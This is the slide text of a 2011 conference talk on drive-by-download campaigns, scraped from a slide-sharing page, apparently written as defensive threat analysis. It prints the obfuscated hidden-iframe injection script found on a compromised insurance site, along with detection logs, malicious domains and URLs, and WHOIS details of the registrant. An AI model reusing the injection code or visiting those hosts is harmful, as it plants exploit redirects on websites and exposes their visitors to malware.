Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 
NLIT 2011: Chef & Capistrano
NLIT 2011: Chef & CapistranoNLIT 2011: Chef & Capistrano
NLIT 2011: Chef & Capistrano
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 

Más de DefconRussia

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

Más de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Último

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 

Último (20)

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 

Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

  • 1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
  • 2. Drive-By-Download • Hackers distribute malware by "poisoning" legitimate websites • Hacker injects malicious iframes into HTML content • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used You just want information by attacker about insurance, nothing more, but…
  • 3. What does it look like? Host ready Malware Malware server controlled by attacker PC connected to the Internet Exploit OS, browser plugins, etc. INFO Exploit server controlled by attacker Known server with Intermediate server iframe controlled by attacker
  • 4. How we find it? Date/Time 2011-08-05 10:44:53 YEKST Tag Name PDF_XFA_Script Observance Type Intrusion Detection Cleared Flag false Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Target Service unknown Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eeb b038bd46a63e08665f308 1fb408/6cd14aca5927118 2c8a04159f9ad2804.pdf
  • 5. DOES USER NEED IT?? How we find it? Date/Time 2011-08-05 10:44:53 Tag Name PDF_XFA_Script Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eebb 038bd46a63e08665f3081 fb408/6cd14aca59271182 c8a04159f9ad2804.pdf
  • 6. First indicators Date/Time 2011-07-26 11:24:37 Tag Name PDF_XFA_Script arg 3592ba48df0fae9e5f5c5b09535a 070d0b04020600510f0c56075c0 6040750 compressed zlib server mamjhvbw.dyndns.pro URL /ghqlv3ym/
  • 7. First indicators Date/Time 2011-08-16 13:24:44 Tag Name ActiveX_Warning :clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server skipetar.in URL /jb/pda.js Date/Time 2011-08-18 19:00:13 Tag Name ActiveX_Warning clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server e1in.in URL /stat/574a353789f/pda.js
  • 8. First indicators Date/Time 2011-08-09 10:17:14 Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 compressed gzip server inaptly.in URL /jb/lastrger.php Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root :compressed gzip compressed zlib :server oligist.in server e1in.in URL /stat/574a353789f/lastrger.php :URL /jb/lastrger.php
  • 9. First indicators Date/Time 2011-07-26 11:24:37 Date/Time 2011-08-09 10:17:14 Date/Time 2011-08-16 13:24:44 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 Tag Name ActiveX_Warning compressed gzip :clsid CAFEEFAC-DEC7-0000-0000- arg 3592ba48df0fae9e5f5c5b09535a ABCDEFFEDCBA 070d0b04020600510f0c56075c0 server inaptly.in 6040750 compressed zlib server skipetar.in server mamjhvbw.dyndns.pro URL /jb/lastrger.php URL /jb/pda.js URL /ghqlv3ym/ Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name ActiveX_Warning Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root clsid CAFEEFAC-DEC7-0000-0000- :compressed gzip compressed zlib ABCDEFFEDCBA :server oligist.in server e1in.in server e1in.in URL /stat/574a353789f/lastrger.php URL /stat/574a353789f/pda.js :URL /jb/lastrger.php
  • 12. Example: o-strahovanie.ru SEP 02 / ============ bbb ============document.xmlSettings.if_ik=false;if(window.localS torage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=docu ment.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.ti me(),{ expires:(document.xmlSettings.time() + 86400*365) }); Cookie: document.xmlSettings.iframe=document.createElement ('iframe'); if_ik1315314771 document.xmlSettings.iframe.style.cssText='height:1px; www.o-strahovanie.ru/ position:absolute;width:1px;border:none;left:- 5000px;'; 16004293056256333102392 document.body.appendChild(document.xmlSettings.ifra 93001403230174358* me); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'a rding.i'+'n/xtqd2/08.p'+'hp';}
  • 13. Example: o-strahovanie.ru / ============ bbb ============ else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ document.xmlSettings.iframe= document.createElement('iframe'); document.xmlSettings.iframe.style.cssText= 'height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings. iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} Cookie: if_ik1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
  • 14. Example: o-strahovanie.ru else{// 4 osel … document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src= 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} iframe.src= 'http://disregarding.in/xtqd2/08.php'
  • 15. Drive By Download o-strahovanie.ru Sep 02 NO Host ready Malware Malware server PC connected to the Internet Exploit NO OS, browser plugins, etc. INFO Exploit server Known server with Intermediate server iframe disregarding.in
  • 16. Drive By Download o-strahovanie.ru Sep 12 Host ready Malware Malware server chamberwoman.in PC connected to janiculum.in the Internet Exploit OS, browser plugins, etc. INFO Exploit server chamberwoman.in janiculum.in Known server with Intermediate server iframe disregarding.in
  • 17. Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario
  • 18. Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario No Payload, because No Payload Requests? Are they looking for customers?
  • 19. Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name: Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
  • 20. Russell Rosario Domain Name:FILTRATED.IN filtrated.in Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN) Created On:14-Jul-2011 11:09:56 UTC Registrant ID:TS_16731618 raptnesses.in Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Created On:14-Jul-2011 11:09:56 UTC Registrant City:Winter Haven Registrant State/Province:Florida tansies.in Registrant Postal Code:33830 Registrant Country:US Created On:14-Jul-2011 11:10:03 UTC Registrant Phone:+1.8635571308 Email:russellsrosario@teleworm.com But Sally Doesn't Know…
  • 21. Attack before public disclosure • Primary location for malicious sites: .IN • Physical servers location by IP-Address: Romania • Responsible person: Russell Rosario • Domains are new
  • 22. Domain owner is the same Domain Name Created On Registrant Name irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario 20-Jul-2011 Acrobat Vulnerability vendor notified
  • 23. Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability X. DISCLOSURE TIMELINE ----------------------------- 2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers 2011-09-14 - Public disclosure ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-26 - Coordinated public release of advisory ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-27 - Coordinated public release of advisory
  • 24. Harvetering machine started Domain Name Created On Registrant Name microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
  • 25. But may be someone knows? • Spamlists • AV Vendors • Safebrowsing • Securityfocus
  • 29. Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM Subject: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack! Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa2 4nw91yhoszkdmoh413ywv6cp7"
  • 30. PDF vulnerabilities public disclosure Sep 14. What to expect?
  • 31. PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
  • 32. No good news. Hundreds of domains were registered ITALIA-NEW.IN KLERK-EVEN.RU BANER-KLERK.RU KLERK-EVENTS.RU BANK-KLERK.RU KLERK-LAW.RU BANNER-KLERK.RU KLERK-NEW.RU BLOGS-KLERK.RU KLERK-NEWS.RU BUH-KLERK.RU KLERK-REKLAMA.RU DAILY-KP.RU KLERK-RU.RU FORUM-KLERK.RU KLERK-WORK.RU I-OBOZREVATEL.RU KLERK2.RU INTERFAX-REGION.RU OBOZREVATEL-RU.RU JOB-KLERK.RU OBOZREVATELRU.RU KLERK-BANK.RU WIKI-KLERK.RU KLERK-BANKIR.RU PRESS-RZD.RU KLERK-BIZ.RU RZD-RZD.RU KLERK-BOSS.RU IPGEOBASE.IN KLERK-BUH.RU ***
  • 33. “New generation” Host ready Malware Malware server controlled by attacker PC connected to Exploit the Internet OS, browser plugins, etc. INFO Exploit server controlled by attacker Intermediate server controlled by attacker Known server with Other known server iframe NOT controlled by attacker
  • 34. Attack after public disclosure • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,… • Physical servers location by IP-Address: International • Domains registered to different spurious persons • Domain lifetime ~ time to Blacklists appearance • Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique) • If you don't know exact malware URL, site redirects to well known server • Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
  • 35. Known sites examples: RZD.RU Russian rail roads
  • 37. Known sites examples: RZD.RU Russian rail roads
  • 39. Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
  • 41. Other examples: EG.RU (newspaper, 263 685 visits per day)
  • 42. Other examples: svpressa.ru (newspaper 276 720 visits per day)
  • 45. Another news, another phone… • Legal • Faked
